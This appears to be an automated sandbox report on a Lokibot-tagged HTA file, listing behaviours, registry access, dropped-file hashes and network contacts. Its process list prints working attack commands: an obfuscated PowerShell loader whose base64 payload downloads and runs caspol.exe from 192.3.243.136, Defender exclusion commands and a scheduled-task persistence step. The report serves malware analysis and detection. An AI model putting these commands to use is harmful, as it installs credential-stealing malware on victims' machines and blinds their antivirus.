Analysis Overview
SHA256
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182
Threat Level: Known bad
The file givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta was found to be: Known bad.
Malicious Activity Summary
Lokibot
Lokibot family
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Evasion via Device Credential Deployment
Downloads MZ/PE file
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
Loads dropped DLL
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
outlook_win_path
Suspicious behavior: EnumeratesProcesses
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-18 17:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-18 17:36
Reported
2024-11-18 17:38
Platform
win7-20241010-en
Max time kernel
134s
Max time network
144s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2364 set thread context of 2184 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta"
C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe
"C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'JFo3VE02ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFckRFZmluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnJwdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGaUVJdnlPaGJJcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWVCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPZ2NBUnYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo3VE02OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjQzLjEzNi8zNy9jYXNwb2wuZXhlIiwiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUiLDAsMCk7c1RBUlQtc0xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjYXNwb2wuZXhlIg=='+[CHAr]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gcy1gdzu.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B68.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7B67.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2FB8.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | baafe88179dc4258625508d251e9433b |
| SHA1 | a18d3fcca419ef0189bc27c5c11f2d8650414c6f |
| SHA256 | fd31e9a08ad49185902a5b4d363753e84a30f594b0b737ae35344ff3ad8e3f3d |
| SHA512 | cac5cea7d219ffbd2d3cb5ab4a6e24d0ce86762c2672bffcf8431b5ef6e0a4aa37886e1dcb340aedee20f2450264977b787668b60117b5104917a1a6be4e263a |
\??\c:\Users\Admin\AppData\Local\Temp\gcy1gdzu.cmdline
| MD5 | e46d949b3b806672dff146631e084b22 |
| SHA1 | ce4dbfcf962c55079a02fe2175d5f79dc2f6241d |
| SHA256 | bd13fd164b3c8e4242112fa1e450c5dcd0ff8dd4533c356d0b99233fa8b3fa82 |
| SHA512 | 771aa6e00336cb991eea0213391fb7a574812ab537dabb0c26e465423ade39af7240c3572658e5e90a03dd77fbbf419af5d7146dfea4e4d388b243fc48b8616f |
\??\c:\Users\Admin\AppData\Local\Temp\gcy1gdzu.0.cs
| MD5 | f8419bbc398e1a2b134eec88b333f8f6 |
| SHA1 | 57ebba4cad00272da80b919df0908ec40f9be48a |
| SHA256 | 25fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3 |
| SHA512 | b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC7B67.tmp
| MD5 | 76ebb156653c2f2789cb1a49d039662e |
| SHA1 | 2a2025c0e92660609bfe05727954bb7ed801b9b4 |
| SHA256 | e7b27d0922fd596ad5adc8b018bcbd7bdd3898be1760736626c1b7275b5ded01 |
| SHA512 | bc2d7ec16be6b074a8f369ce81c54f5ee4ba417f3f320a6debab3c1fc86202718c3a79fe083d36b684770bf349a8de042aa492a43b9421f9191f5b414c077c69 |
C:\Users\Admin\AppData\Local\Temp\gcy1gdzu.dll
| MD5 | 64a5e8597d9c10d936f454bee6b73ada |
| SHA1 | 7a20d3b6eb7ebae39b4d18ef3d19953903c9b970 |
| SHA256 | 7c912db647b5a92d82d832246b35b6d79c9cce29a3e849f61b6b9b694afbd5ec |
| SHA512 | 1c8e07acf2658dff805e49dc3979d97be1a2e2ba291af1ed681a6f1a61ec98dc27035ec27bc195c4c51c69e68b72544ce7cbae67abe504d359af4cdb175695c8 |
C:\Users\Admin\AppData\Local\Temp\RES7B68.tmp
| MD5 | 60938ba734d356cdbd0088a2a125ceb9 |
| SHA1 | ed0f625527cf7e380748ed5f0bc4cf3d8457782d |
| SHA256 | 9988b58e97bb2246945c02de05fa4c74c087a679720b60e2bec77bfe9e6f02f6 |
| SHA512 | 1ce350ad62ef4350a106f56de4151ebaebb49327930c94a03f0995d81dcfd0b63bf6d8b7cc95a85e0e6903f43003f192fe02fbcac631c60a0ef7bc3181e799d3 |
C:\Users\Admin\AppData\Local\Temp\gcy1gdzu.pdb
| MD5 | 50c5616b4162a22d4a4eec06178f67e3 |
| SHA1 | cdada22ff816ea188e11247da184d9140d336c26 |
| SHA256 | 669ca6e2cfa316c5a9938884cf919a2757918928f40be9912e7626c4b35153cc |
| SHA512 | 73f15ed96a6aea579d22fde0d975aa1466f282b0ee3f7a9d603650dacda40aaf1cf8efdad5f0cc17c163f2ba7fed2a7595ab534e6c5fd88e5224e2910309ba31 |
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 318ff90d7a2797a041b836f7f8900f62 |
| SHA1 | fdda6afed7a1643ae353e7a635e6744c2b0a07d5 |
| SHA256 | 241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430 |
| SHA512 | 808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac |
memory/2364-35-0x0000000000290000-0x0000000000324000-memory.dmp
memory/2364-36-0x00000000003D0000-0x00000000003E2000-memory.dmp
memory/2364-37-0x0000000005290000-0x00000000052F4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 0c4b894cedbe547fb993389e509e9669 |
| SHA1 | be2b9f698731cf7b75848d46e8101d8a9c40c724 |
| SHA256 | 1e2d142b7709e15454691457c51df3fad9f885ad7dd8dca80c78501ba8d49fea |
| SHA512 | 0cd0ac75661c7f7de5d2ba2d30b922aba8086547a4db9fc956682a8f553d3a770fe956cb63087831b55a696553963957ffb2f2b8a6a1089adf9900d8608a8cd6 |
C:\Users\Admin\AppData\Local\Temp\tmp2FB8.tmp
| MD5 | 06936a3c1db83f5c87bca803fc45306b |
| SHA1 | 5bf371b8f1c9204bbf48f3a31d664bafd16b9fbd |
| SHA256 | 68a60050215e39d48e3032d5826bb5282009308721c71a9556a8056377ecae8e |
| SHA512 | 9281d5c736c1f34debd8713e71ec2435cd8edaff281c6bbf9afdec29e359804487e247ba9ae3acd9442e4ecc51a6537900b390fc753dd521bac0f785fc46ffd9 |
memory/2184-54-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-58-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-56-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-67-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-65-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-64-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2184-62-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-60-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2039016743-699959520-214465309-1000\0f5007522459c86e95ffcc62f32308f1_d58f30ce-7498-4544-8c46-d67b11e386bc
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2039016743-699959520-214465309-1000\0f5007522459c86e95ffcc62f32308f1_d58f30ce-7498-4544-8c46-d67b11e386bc
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-18 17:36
Reported
2024-11-18 17:38
Platform
win10v2004-20241007-en
Max time kernel
138s
Max time network
147s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3440 set thread context of 2760 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe
"C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'JFo3VE02ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFckRFZmluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnJwdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGaUVJdnlPaGJJcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWVCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPZ2NBUnYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo3VE02OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjQzLjEzNi8zNy9jYXNwb2wuZXhlIiwiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUiLDAsMCk7c1RBUlQtc0xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjYXNwb2wuZXhlIg=='+[CHAr]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vpqxczhe\vpqxczhe.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD38C.tmp" "c:\Users\Admin\AppData\Local\Temp\vpqxczhe\CSC633947E119804030A21172F9908F922A.TMP"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
